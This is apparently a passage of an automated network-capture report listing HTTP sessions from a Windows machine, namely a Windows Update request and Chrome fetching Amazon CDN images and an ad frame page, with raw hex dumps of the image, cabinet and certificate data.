                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: d5 f0 17 57 c0 5d fc ff 00 0c fd bc 69 97 4e df a7 9f d3 b3 a7 67 4e cf 6f 46 b5 21 18 b9 bc 50 83 21 38 27 8c b1 03 30 1d b1 16 bf 9a 0d 03 18 72 2c 71 e2 89 6c 42 12 f1 06 26 15 74 cc 24 c2 04 38 f7 24 e9 e2 2c db 8e a1 97 1e 71 15 85 22 62 2d 0e 32 94 85 82 b6 48 6b 69 45 e2 fd 1f 1f 54 2d 51 ce f9 ba a2 01 23 e9 b3 75 56 eb d4 c7 c6 2d 27 03 5a 3b b5 6b 18 9b 00 8e a9 1e 91 81 26 8c df 1b 61 89 e9 2b 58 c3 d6 8e a9 f7 78 67 ed e3 4d e5 fa 4f fd 1f b4 fe 6d dd 03 59 16 38 0e 0c b8 f5 7b 63 92 d5 42 cb 2c 32 30 6d fa 39 72 41 f2 d0 6c 7d 26 ac d8 9f f5 89 4f 28 11 59 30 6c 7b c7 b7 4e c9 15 a8 10 b8 d0 fb 7b bd 5a 74 e3 3c d5 b9 b5 dd 0f 91 96 83 c4 8b 22 47 25 89 c9 ea bc a9 56 14 83 6f 1e c3 11 67 0e 9f a5 42 c5 f8 c9 84 59 63 04 4b d2 8c 34 c5 a8 17
                                                                                                                                                                                                                                                                Data Ascii: W]iNgNoF!P!8'0r,qlB&t$8$,q"b-2HkiET-Q#uV-'Z;k&a+XxgMOmY8{cB,20m9rAl}&O(Y0l{N{Zt<"G%VogBYcK4
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 3e 96 2b 5a ae 19 58 d6 ad 83 7b d4 ff 00 50 b7 21 a7 ac 13 4e 0e 35 e3 d4 82 5c eb d7 0b 40 0c 59 81 bb 61 a2 ea 9b 09 63 54 07 ce 6c 2b 50 31 96 a8 36 ad 55 01 33 ea 22 d8 27 aa f1 cd 06 bd 51 b7 ab 35 6b 57 1c ac 98 65 b5 b6 7f 2f 89 ff 00 91 66 09 c8 4f 30 56 5a 51 c4 ad ec 5f fa 83 ba 8a 3b b7 ee 83 44 56 b8 9e 30 ad b8 87 a6 62 e7 15 fb 30 25 23 3c c1 db 71 c7 12 0f 60 47 02 6d 33 9e 49 8d 26 4f 24 36 dc 23 d3 19 f5 8e e3 8f c8 e8 20 cb a8 96 90 5c 70 23 ae ad 19 70 5c b5 c2 eb eb 29 7d 2a 60 64 82 0e 3a 65 6b 15 8f 48 92 16 47 07 2f a4 97 ff 00 d0 6b 2c 43 b7 0a 50 28 7a 41 9a da ec 2e a2 00 80 8e 05 f4 10 f9 e4 fe db 5a 63 8c e3 27 53 52 67 9c 65 65 30 3a 09 7a fa eb 98 91 6d 55 34 a0 8d 8a 16 0f 49 a3 5d 5d 25 d4 1f 95 9f b6 f7 27 bd e9 f3 d3 e7
                                                                                                                                                                                                                                                                Data Ascii: >+ZX{P!N5\@YacTl+P16U3"'Q5kWe/fO0VZQ_;DV0b0%#<q`Gm3I&O$6# \p#p\)}*`d:ekHG/k,CP(zA.Zc'SRgee0:zmU4I]]%'
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: e9 4a 18 26 81 d3 fa 63 33 e1 18 d0 85 0d 41 ba da a8 f7 e0 f6 31 8f c8 d2 5e e5 5b af 1a fa 2e 1e d9 e3 6b 65 35 06 02 86 c9 af 79 b9 09 73 1e d9 76 51 40 6a bc 58 73 b8 4a 0c 87 9a 98 fd e3 8d 69 84 e2 50 05 05 a9 28 66 27 03 01 56 25 9b 10 f6 9e 26 fe c2 22 6c 55 83 c2 de c3 49 e4 53 aa 2e 3a d5 3e 46 b6 ec 92 31 db 5a 56 0a f2 18 f1 25 a0 8a ac 14 25 02 95 80 73 75 1a b5 e7 98 1b 7c 4c 13 54 0b 2a 94 df ee ff 00 a0 a1 a1 1c 37 0c c8 15 a9 d9 e0 2a 8c 59 96 bd 6f 6b d6 67 d4 28 db 1e c4 1c 1a 04 b5 fd 7a 1f 2e c2 86 58 9f 06 68 2b c2 3c 0c c4 dd a4 f9 80 2b f2 a3 18 8f b0 b0 f8 14 68 2c b5 0c 32 b9 5c cd f2 cc b8 96 00 c0 61 d1 ee 94 6a 2c 15 8e c1 7b c0 46 41 1e 05 17 f1 8a 82 b0 0c 34 7d 08 b3 cb 7e 33 51 a8 3d 04 aa 96 17 ee a2 07 ef b0 b0 e7 a7 fa
                                                                                                                                                                                                                                                                Data Ascii: J&c3A1^[.ke5ysvQ@jXsJiP(f'V%&"lUIS.:>F1ZV%%su|LT*7*Yokg(z.Xh+<+h,2\aj,{FA4}~3Q=
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1193INData Raw: 8b bb 43 55 e8 bb c3 0e e6 00 2e e9 df da af e1 d4 40 14 58 9b 13 b8 b5 36 97 6c 5b 47 c2 3f 30 74 4b d0 e3 e6 9b 2f dc 1c 62 88 9b 4a d5 7c 75 14 b9 f6 bb c6 08 5c f3 a2 ee be 2f 21 f1 1d a3 21 56 d5 f6 cf 4b c3 67 d0 d8 7d 41 21 66 d9 7f 5a 3e a0 ae fb 95 4d 3f 36 fe b9 fe 65 1a 16 ed 96 f7 7e 6f dc 38 06 e2 e1 fa ff 00 89 ac 10 87 0e 2b fa 87 54 1a 46 99 6d 03 65 e1 af 21 bf be 08 42 1c 7c b0 f9 36 fe d2 eb bb ef 90 89 8e 76 47 2b 63 90 21 21 c8 34 9c e1 b2 10 e0 84 21 08 42 1c 10 84 21 08 70 42 1c 10 9f ff c4 00 26 11 01 00 01 03 02 06 02 03 01 00 00 00 00 00 00 00 01 11 00 21 31 41 51 10 61 71 81 91 a1 20 b1 c1 d1 f0 40 ff da 00 08 01 03 01 01 3f 10 e3 6f 3d 92 68 90 17 43 08 d9 ff 00 25 65 b7 df 69 87 1c 61 87 9e 69 e7 18 61 44 70 28 f8 1c 0a 28 a3
                                                                                                                                                                                                                                                                Data Ascii: CU.@X6l[G?0tK/bJ|u\/!!VKg}A!fZ>M?6e~o8+TFme!B|6vG+c!!4!B!pB&!1AQaq @?o=hC%eiaiaDp((


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                38192.168.2.44986640.68.123.157443
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kl2U8yuCv7Zo65W&MD=b5mTn25W HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                MS-CorrelationId: 40abf464-70ac-47cd-99a4-108661789fb2
                                                                                                                                                                                                                                                                MS-RequestId: e954d2ba-47f5-4935-b382-b7eb80ade89e
                                                                                                                                                                                                                                                                MS-CV: SvwL4tsTrU+VECS/.0
                                                                                                                                                                                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:25 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 30005
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                39192.168.2.44986918.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC626OUTGET /images/S/sash/Z8YwjOjqIHxqujG.png HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://images-eu.ssl-images-amazon.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                Content-Length: 45977
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 660b3c6d-b61b-4d1d-a46e-6d434f8f30e8
                                                                                                                                                                                                                                                                Date: Tue, 09 Jul 2024 13:11:11 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Fri, 05 Jul 2024 14:44:16 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-190,/images/S/sash/Z8YwjOjqIHxqujG
                                                                                                                                                                                                                                                                Expires: Mon, 04 Jul 2044 13:11:11 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-190 /images/S/sash/Z8YwjOjqIHxqujG
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 134cb849e01fafad6f264ff9633b073e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 1691670
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: uQJ37IJmHnNJuMyjZfXNja8zSkEp5uLK1F7kBU3b68vZOUGjcyGOrw==
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC15524INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c2 00 00 01 27 08 06 00 00 00 fb 1f 9c b4 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 4b 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 54 69 a2 12 92 00 a1 84 18 12 40 ec 88 a8 c0 88 a2 22 82 15 19 14 71 c0 d1 11 90 b1 22 8a 85 41 b1 f7 01 79 08 28 e3 e0 28 36 54 de 0f de 1a 7d b3 e6 bd 37 6f f6 af bd f6 39 67 9d ef 9c 7d 3e 00 46 60 b0 44 9a 85 aa 01 64 4a 15 f2 88 00 1f 3c 36 2e 1e 27 77 03 0a 54 20 81 03 80 40 98 2d 0b 89 f4 8f 02 00 e0 fb f1 f0 ec 88 00 1f f8 02 04 e0 cd 6d 40 00 00 6e d8 04 86 e1 38 fc 7f 50 17 ca e4 0a 00 24 0c 00 a6 8b c4 d9 42 00 a4 10 00 32 72 15 32 05 00
                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR'gAMAaKiCCPsRGB IEC61966-2.1HSgTS=BKKoR RBTi@"q"Ay((6T}7o9g}>F`DdJ<6.'wT @-m@n8P$B2r2
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC16384INData Raw: 08 f2 f2 f2 b2 54 d8 96 98 98 e8 59 b1 7c e9 22 9f cf 97 0d 28 71 f1 f1 33 ad 41 f6 f7 37 6f 58 ff 88 b3 c2 79 28 26 36 ae 4f 44 64 d4 03 c3 46 8c 1c f4 3b 7d 25 7f 78 d4 e3 43 48 60 81 d7 cc 39 fb e3 d9 96 98 c3 ec bb bf e7 91 bb bf 62 7f f7 74 ce 4e 4b e0 47 8f 85 a3 5e 66 57 2f 01 dd 87 6b fb 7e d2 2f 3a 9b a2 47 66 21 3d c7 0e 9f 6c e2 94 e3 a3 0c c3 70 a6 6e db bc 62 e1 fc 79 17 78 3c 9e fc c2 82 82 39 15 2e 57 be ae eb de 92 e2 92 2d 52 4a 8f d7 eb 9d 7e c7 4d 37 fc 7b c3 ba 35 af f6 1f 38 f8 b6 9a 32 ba 75 4f 0e 9e 3e e3 c4 bf d9 1c 8e 14 21 84 7e 38 f3 e0 7b 69 7b f7 2e 1c 3d 66 dc 68 cd 64 8a 91 52 ca a2 c2 c2 3d 59 87 b3 8a 5f 7b ed 35 99 95 71 60 a7 22 44 b1 94 92 b0 f0 88 18 4d 32 ac dc 59 36 b7 a2 bc 7c bd ae fb 49 4c ea 36 d2 64 b5 9f 33 6a
                                                                                                                                                                                                                                                                Data Ascii: TY|"(q3A7oXy(&6ODdF;}%xCH`9btNKG^fW/k~/:Gf!=lpnbyx<9.W-RJ~M7{582uO>!~8{i{.=fhdR=Y_{5q`"DM2Y6|IL6d3j
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC14069INData Raw: 69 16 69 5f a7 f3 74 61 08 2f f7 56 10 aa c2 7d ef af e4 82 b1 49 8c 4a 2a e1 e2 8c f5 3c 9d 17 82 a7 d2 73 30 a3 57 24 49 d1 41 bc b9 e2 40 b5 2c 21 04 dd ba 46 11 66 3f d8 ec fd 98 34 13 68 6d 57 04 b5 09 b7 68 27 7e 5b 34 a9 08 fe bc 7c 4a 6e 7d 04 61 b7 a0 c4 47 05 de b4 a8 94 3e ff 3a fe cd 7b 71 de fb 1e 5d 4b 96 34 25 a2 1a cf 44 16 70 49 dc 3e c2 b5 23 16 ff e1 6c 2f df be b6 91 8a 72 0f 9a 49 60 b3 9b 19 3c 2a 91 e3 2e 1c c0 d8 f3 3c cc 7f 37 95 0d 3b fa 30 69 f8 56 54 61 30 31 f4 20 5f 3a f2 f8 34 27 85 5b f2 23 aa 9f e9 af dd 38 89 e8 55 4b f8 36 5b e5 c1 2d 4e 8c 60 1d 7f 8a 1d 1d 85 c2 52 37 67 3e b6 80 59 27 f6 e6 a6 73 4f e7 e1 f9 0b f8 36 15 0e 49 48 8a 0e 62 44 ff 2e bc b5 e2 40 b5 2c 69 48 6e 78 65 09 15 7a 67 4b cb ff 25 34 a9 08 fa be
                                                                                                                                                                                                                                                                Data Ascii: ii_ta/V}IJ*<s0W$IA@,!Ff?4hmWh'~[4|Jn}aG>:{q]K4%DpI>#l/rI`<*.<7;0iVTa01 _:4'[#8UK6[-N`R7g>Y'sO6IHbD.@,iHnxezgK%4


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                40192.168.2.44987418.239.24.1884437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC749OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 9989c84c-d92a-4437-93c1-a28cf89f9497
                                                                                                                                                                                                                                                                Date: Thu, 08 Aug 2024 13:23:38 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 08 Aug 2024 13:22:36 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-541,/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df
                                                                                                                                                                                                                                                                Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-541 /images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 c26e94322027d14813c3c25e1b340274.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 345356
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 7Y5rnTUH7UJhrOVAgxNQMA8tchD-RkLZO3i-d3HZcGv4IUF2Muvh9g==
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC167INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 66 2d 31 2e 35 30 2e 31 36 37 35 35 65 30 62 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.16755e0b.js" ></script></body></html>


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                41192.168.2.449878151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC683OUTGET /images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X._SY116_CB613596448_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4119
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 155987bd-dff7-4711-b3c5-179394104e7d
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 06 Feb 2023 11:45:15 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sun, 17 Apr 2044 04:47:15 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 2856475
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:26 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000123-IAD, cache-nyc-kteb1890094-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a2 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 01 04 05 02 03 08 10 00 02 01 03 02 03 05 04 06 07 08 03 00 00 00 00 01 02 03 00 04 11 12 21 05 31 41 06 13 22 51 61 07 32 71 81 14 16 91 92 a1 b2 23 42 52 93 b1 d1 d2 15 17
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Qa2q#BR
